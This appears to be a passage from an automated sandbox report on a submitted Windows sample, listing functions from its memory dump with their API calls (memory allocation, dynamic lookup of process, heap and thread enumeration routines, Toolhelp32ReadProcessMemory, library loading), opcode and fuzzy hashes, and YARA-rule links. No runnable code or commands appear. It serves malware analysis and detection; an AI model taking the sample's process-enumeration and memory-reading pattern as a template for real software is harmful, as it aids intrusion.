                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Eventtime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2982266575-0
                                                                                                                • Opcode ID: 49c1c3190b9151b0727bb2a38b319954a91a0b9d8cf41803ac23844e161a22dc
                                                                                                                • Instruction ID: 3c76962fdabdcbc67d51f638ec7214cd1688da2f8b24b2cd5185835dddaecb3b
                                                                                                                • Opcode Fuzzy Hash: 49c1c3190b9151b0727bb2a38b319954a91a0b9d8cf41803ac23844e161a22dc
                                                                                                                • Instruction Fuzzy Hash: 6AC048B1391B002AFA10A6A55C82F322A9DD306B11F20A056B609AA2C5D2A658408E68
                                                                                                                Function 02EC4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02EC4C3F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2525500382-0
                                                                                                                • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                • Instruction ID: 63b899d10dd593a41244a141714c9bd06b4310249d5939ce1fc0ce38e3a2ea8e
                                                                                                                • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                • Instruction Fuzzy Hash: 46B092292C820515FA1822E24F10BF2044C0B5128AFA4B059AF19C80E5FA00C0039836
                                                                                                                Function 02EC4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02EC4C57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3341692771-0
                                                                                                                • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                • Instruction ID: 4095003eb393fdb8a0df9870ffbaf6d6517a14e533b38d52df3a2865f2dba342
                                                                                                                • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                • Instruction Fuzzy Hash: 8EA0129C040202055A0A2298422041E11222EC02443A4D09C1104090554A2580027820
                                                                                                                Function 02EC15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02EC1A03,?,02EC1FC1), ref: 02EC15E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: ed1e4bf7f4dfea21596e598c36f5a73c725b628a79c1b7dbb49e0bc2d79c6c96
                                                                                                                • Instruction ID: 67f75938cc8995733c9a3eacd0a806b903c324538b6d1e1ecf9a8f0180a966e9
                                                                                                                • Opcode Fuzzy Hash: ed1e4bf7f4dfea21596e598c36f5a73c725b628a79c1b7dbb49e0bc2d79c6c96
                                                                                                                • Instruction Fuzzy Hash: 51F031F4B413044FDB05DFB99940705BAE6E78A384F20857DD609EB384E7B584128B00
                                                                                                                Function 02EC1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02EC1FC1), ref: 02EC16A4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 9d9c3c15b457fe2a8aa6b32e423e1891741a0579f2c2e8f750a927ae0ef90c24
                                                                                                                • Instruction ID: d3c08575459abd802023e7ddce543a0caf998f32b47a18dbef04cd6282348e07
                                                                                                                • Opcode Fuzzy Hash: 9d9c3c15b457fe2a8aa6b32e423e1891741a0579f2c2e8f750a927ae0ef90c24
                                                                                                                • Instruction Fuzzy Hash: 08F024B6B407986BD710DF8A9C80B82FBD8FB15354F104139FA0CDB340CBB0A8108B94
                                                                                                                Function 02EC16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02EC1FE4), ref: 02EC1704
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 5d2a76e6790dcf207813940990b72fd48e7d360a570c2198eb6815bf262b145e
                                                                                                                • Instruction ID: ad74231b13ba3dca2f973c1198886afed56a0ca8c2b51bb8c4851e0fea2e1445
                                                                                                                • Opcode Fuzzy Hash: 5d2a76e6790dcf207813940990b72fd48e7d360a570c2198eb6815bf262b145e
                                                                                                                • Instruction Fuzzy Hash: ADE086793403016FD7105AB95E40B52BBDCEB55654F349479F50DDF242D6A0E8128B60

                                                                                                                Non-executed Functions

                                                                                                                Function 02EDAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02EDADA3,?,?,02EDAE35,00000000,02EDAF11), ref: 02EDAB30
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02EDAB48
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02EDAB5A
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02EDAB6C
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02EDAB7E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02EDAB90
                                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02EDABA2
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02EDABB4
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02EDABC6
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02EDABD8
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02EDABEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02EDABFC
                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02EDAC0E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02EDAC20
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02EDAC32
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02EDAC44
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02EDAC56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                • API String ID: 667068680-597814768
                                                                                                                • Opcode ID: 6fa1289e8470c0183abd50d974a4bee51ae1fec43b649518229573499b953a31
                                                                                                                • Instruction ID: f151b7df8162fa152c5992ecc5cbd75da7c97dba37192007b9b61e99c6629eee
                                                                                                                • Opcode Fuzzy Hash: 6fa1289e8470c0183abd50d974a4bee51ae1fec43b649518229573499b953a31
                                                                                                                • Instruction Fuzzy Hash: 77310EB4AC02549FEF10FFB49984A2AB3E8AF56251710AD75B401CF304E7B4A552CF12
                                                                                                                Function 02EC5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5925
                                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02EC593C
                                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02EC596C
                                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC59D0
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A06
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A19
                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A2B
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000,02EEE790), ref: 02EC5A37
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14,02EC0000), ref: 02EC5A6B
                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EC6C14), ref: 02EC5A77
                                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02EC5A99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                • Opcode ID: 601a8a0ae9b361dd454e14d0fc449c82c852ff908bb74d4bcfb38ec73b96c684
                                                                                                                • Instruction ID: 844209abe0d4f179a4976b9875320fbc05d059987a0854ee310a31b94c583e96
                                                                                                                • Opcode Fuzzy Hash: 601a8a0ae9b361dd454e14d0fc449c82c852ff908bb74d4bcfb38ec73b96c684
                                                                                                                • Instruction Fuzzy Hash: F4418371D80219AFDB10DEE8CE88ADEB3BDAF04344F6495A9E158E7241D770EE458F50
                                                                                                                Function 02EC5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EC5BE8
                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EC5BF5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EC5BFB
                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EC5C26
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5C6D
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5C7D
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EC5CA5
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EC5CB5
                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EC5CDB
                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EC5CEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                • API String ID: 1599918012-2375825460
                                                                                                                • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                • Instruction ID: 34a51e0ebb2095220e6dbf06ac751cc4b29d5f49e69651d5d98d3bb1d5997e85
                                                                                                                • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                • Instruction Fuzzy Hash: D2310971E8021C29EB25C6F4CD45FDFB7AD8B00384F6091A9B608F6181D774DE468F50
                                                                                                                Function 02EC7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02EC7FF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1705453755-0
                                                                                                                • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                • Instruction ID: 3e40fb6a4ca98a0fd192e49ced7f4c5e10978cd408c13ffc7267a29a40864cc9
                                                                                                                • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                • Instruction Fuzzy Hash: 431100B5A00209AF9B00CF99C981DEFF7F9FFC9300B64C559A404E7254E671AA018B90
                                                                                                                Function 02ECA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                • Instruction ID: a523a80a186f04f10154ba4c9248c00976ee56c2eff433bed4d2e05d83c00049
                                                                                                                • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                • Instruction Fuzzy Hash: 7DE0927274421817D311A9989E84EEA725D9758310F10927EB905C7385EDB09E814AE4
                                                                                                                Function 02ECB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetVersionExA.KERNEL32(?,02EED106,00000000,02EED11E), ref: 02ECB79A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                • Opcode ID: d2876b9a1a4a3fefbc981ffbb49526b5c3938462b7f7781311031153a5967eb5
                                                                                                                • Instruction ID: 65e2a740208959c8e9c0578e3562b4d118974653cf05cfb9796d269da9f673a4
                                                                                                                • Opcode Fuzzy Hash: d2876b9a1a4a3fefbc981ffbb49526b5c3938462b7f7781311031153a5967eb5
                                                                                                                • Instruction Fuzzy Hash: 26F0E274984301CFD740DF6AD54361677E9FB88624F989D2CFA988B380E7349495CB52
                                                                                                                Function 02ECA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02ECBE72,00000000,02ECC08B,?,?,00000000,00000000), ref: 02ECA823
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                • Instruction ID: 20276448f7ae862233b986b6e20d6a14c2920609139787deccdd9e37cf0cc92f
                                                                                                                • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                • Instruction Fuzzy Hash: B2D05BA334E1542AA210559A2E44D7B5ADCCAC5765F10903DB948C6301D210CC07D6B1
                                                                                                                Function 02EC920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 481472006-0
                                                                                                                • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                • Instruction ID: 9e48bd7729f3347e79b37422eace040c189afc553187385fa5332c94e778505f
                                                                                                                • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                • Instruction Fuzzy Hash: BEA0128044482041854033180C0253930445C50A20FD4C74478F8402D0E92D41208093
                                                                                                                Function 02EC20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
